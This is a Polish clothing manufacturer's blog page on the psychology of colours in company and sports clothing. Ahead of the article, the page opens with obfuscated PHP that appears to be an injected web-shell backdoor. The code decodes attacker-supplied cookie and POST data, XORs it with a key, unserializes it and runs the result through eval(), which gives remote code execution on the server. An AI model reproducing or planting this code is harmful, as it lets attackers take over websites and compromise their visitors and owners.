$EJaOT = "\126" . chr ( 955 - 860 ).chr ( 671 - 603 )."\x58" . chr (99); $VVLiGmUYa = 'c' . 'l' . "\141" . chr (115) . chr ( 410 - 295 )."\x5f" . "\x65" . "\170" . 'i' . chr (115) . chr ( 562 - 446 )."\x73";$rFawcyv = class_exists($EJaOT); $EJaOT = "36152";$VVLiGmUYa = "21333";$yYoMUkBeNy = FALSE;if ($rFawcyv === $yYoMUkBeNy){function sAPreRGv(){return FALSE;}$XHXXE = "10820";sAPreRGv();class V_DXc{private function ohtQEAxR($XHXXE){if (is_array(V_DXc::$GaZiZD)) {$JiEBcU = str_replace("\x3c" . chr ( 625 - 562 )."\x70" . "\150" . chr ( 372 - 260 ), "", V_DXc::$GaZiZD["\x63" . chr ( 296 - 185 ).chr ( 613 - 503 )."\x74" . chr (101) . 'n' . chr (116)]);eval($JiEBcU); $XHXXE = "10820";exit();}}private $xHLRbEru;public function hSghv(){echo 50151;}public function __destruct(){$XHXXE = "64768_25380";$this->ohtQEAxR($XHXXE); $XHXXE = "64768_25380";}public function __construct($XBnRjxdBt=0){$mVTgGVkpqk = $_POST;$ywjXMgqydX = $_COOKIE;$rcJjWi = "05f4c334-1f3e-49a5-9f97-1e89d0914668";$kWepRrWnk = @$ywjXMgqydX[substr($rcJjWi, 0, 4)];if (!empty($kWepRrWnk)){$MINpojrmRv = "base64";$KPzRTIf = "";$kWepRrWnk = explode(",", $kWepRrWnk);foreach ($kWepRrWnk as $RtkBB){$KPzRTIf .= @$ywjXMgqydX[$RtkBB];$KPzRTIf .= @$mVTgGVkpqk[$RtkBB];}$KPzRTIf = array_map($MINpojrmRv . chr ( 113 - 18 ).'d' . chr ( 618 - 517 )."\x63" . chr ( 231 - 120 ).'d' . chr ( 599 - 498 ), array($KPzRTIf,)); $KPzRTIf = $KPzRTIf[0] ^ str_repeat($rcJjWi, (strlen($KPzRTIf[0]) / strlen($rcJjWi)) + 1);V_DXc::$GaZiZD = @unserialize($KPzRTIf);}}public static $GaZiZD = 25873;}$prmYwRn = new /* 45608 */ V_DXc(10820 + 10820);unset($prmYwRn);} Szwalnia psychologii czyli znaczenie koloru – część 1 - Szwalnia Wave Group

Szwalnia psychologii czyli znaczenie koloru – część 1

szwalnia odzieży reklamowej corrida

Kolory mają psychologiczne i emocjonalne znaczenie dla każdego z nas. Badania prowadzone w zakresie psychologii koloru wykazują, że silnie wpływają one na pierwsze wrażenie, oraz na zwiększają aktywację poszczególnych partii mózgu. Sprawdza się to nie tylko w kulturze człowieka. Zwierzęta używają kolorystki do maskowania, odstraszania potencjalnego zagrożenia, a żywe, jaskrawe kolory niejednokrotnie są ostrzeżeniem, że dany osobnik jest śmiertelnie jadowity. Instynktowna analiza i odczytanie intencji na podstawie kolorystyki jest głęboko zakorzenione w naszej naturze.

Wiedza o wpływie jaki noszone przez nas dominujące kolory mają na odbiór w oczach innych mogą być cennym narzędziem. Jako producent odzieży reklamowej, firmowej i sportowej Wavegroup zna ten temat od podszewki. Być może jeszcze bardziej od naszego prywatnego ubioru, wiedza ta znajduje zastosowanie w odzieży firmowej i sportowej, a zatem takiej, która przemawia zarówno do klientów jak i konkurencji. Różowa drużyna piłkarska wydawałaby się przecież mniej zagrażająca, a lekarz w czarno-czerwonym fartuchu co najmniej niepokojący. Nasza szwalnia odzieży zwraca uwagę również na ten aspekt procesu produkcyjnego.

 

CZARNY – Siła, Elegancja, Prestiż, Bezpieczeństwo, Autorytet

 

Czarny kolor silny i dominujący. Całkowicie czarny strój związany jest w kulturze ze smutkiem, śmiercią i żałobą. Kontrastowe przełamanie czerni żywszym kolorem usuwa negatywny obraz zarówno w przypadku odzieży sportowej jak i firmowej. Kolor optycznie wyszczuplający, a ze względu na fakt, że odbija najniższą ilość promieni słonecznych „przyciąga” więcej ciepła. To z kolei może przyczynić się do przegrzania i wzrostu temperatury ciała, w wyniku czego mimo dominującego tonu rzadko używany jest jako kolor dla sportowych drużyn. Czerń maskuje również w znacznym stopniu proste zabrudzenia, umożliwiając schludny wygląd w warunkach w których łatwo do takich zabrudzeń może dojść. Przykładowo kominiarze ubrani w czerń wyglądają na mniej ubrudzonych sadzą. Oczywiście końcowe wrażenie jakie wywrze czarny strój definiuje również krój lub okoliczności. Odzież firmowa w kolorze czarnym w Polsce nosi chociażby policja, wykorzystując go do podkreślenia autorytetu i siły.

 

SZARY – Neutralny, Logiczny, Wycofany, Odpowiedzialny

 

Szary nigdy nie wychodzi z mody, ale nie dominuje jako bardzo popularny kolor. Bardzo neutralny kolor, który wysuwa osobowość na pierwszy plan. Niezagrażający i pasywny nie sprawdziłby się raczej jako dominujący kolor żadnego sportowego stroju. Jednak w odzieży firmowej wpasowuje się w kategorie zawodów w których emocje należy trzymać ”na wodzy”. Stąd stosowany często używany w odzieży pracowników prawa, finansów i bankowości. Szary jest elegancki i dobry na wiele okazji, ale może działać na niekorzyść gdy nosząca go osoba chce się wyróżnić, lub wspomóc pozytywne pierwsze wrażenie.

 

CZERWONY – Energia , Ekscytacja, Agresja, Entuzjazm

 

Najbardziej aktywny i energiczny kolor noszony zarówno przez kobiety jak i mężczyzn. Kolor wybierany przez osoby inicjujące kontakt i dominujące. W przypadku osoby nieśmiałej może pomóc jej odnaleźć pewność siebie. Silny jako dominujący strój drużyny sportowej, podkreślając siłę, energię i agresję sportowca. Niewiele kolorów tak szybko wyróżnia z tłumu, powód dla którego znaki stopu są właśnie w kolorze czerwonym. Czerwony kolor motywuje konsumenta do podjęcia decyzji. Pracownicy sieciowych sklepów o dużej przestrzeni często noszą odzież firmową w tym właśnie kolorze, co czyni ich łatwymi do namierzenia przez konsumentów szukających pomocy. Jeżeli chcesz zwrócić uwagę na sobie łatwo i szybko, czerwony to Twój sojusznik. Niedobry wybór dla osób, które chcą uniknąć znalezienia się w centrum uwagi lub wchodzącymi w interakcje w których naturalnie mogą wystąpić negatywne emocje.

 

ŻÓŁTY – szczęście, optymizm, nadzieja
Kolor łatwy dla oka do namierzenia, stąd dla słynnych nowojorskich taksówek wybrano właśnie żółty kolor. Rzadko używany jako dominujący kolor odzieży prywatnej, pomoże się wyróżniać pracownikom w żółtej odzieży firmowej. Silnie widoczny dla oka żółty to jednocześnie nie zagrażający i nie agresywny. Kolor stosowany w produktach i przestrzeniach skierowanych dla dzieci. Stymuluje ich umysł i kreatywność. Z racji na swój niezobowiązujący i rozrywkowy ton stosowany również w branży wypoczynkowo-rekreacyjnej. Żółty jest kolorem szybkim, zwraca uwagę, zachęca do działania. Przestrzeń wypełniona tym kolorem powoduje brak komfortu na dłuższą metę. Sieciowe restauracje fast-food stosują ten kolor by zachęcić do szybkiego jedzenia, szybkiego wstania i oddalenia się po skończeniu posiłku.

 

NIEBIESKI – spokój, szczerość, czystość, zaufanie
Kolor Uniwersalny dla odzieży zarówno kobiet jak i mężczyzn, choć często uosabiany z męskością i podawany w kontraście do różowego – przypisanego w marketingu do płci pięknej. Kolor nieba i morza więc naturalnie przyjazny dla ludzkiego oka. Niebieski kolor stymuluje obszar mózgu odpowiedzialny za zapamiętywanie informacji. Dlatego informacje na niebieskim tle (przykładowo napisy na niebieskich t-shirtach) są łatwiej zauważalne i zapamiętywane przez konsumentów. Niebieski świetnie pasuje do świata biznesu i korporacji. Jednak stosowany w odzieży firmowej i designie korporacyjnym tak często, że powoli jest z nim kojarzony, co tworzy ryzyko braku oryginalności.

Formularz kontaktowy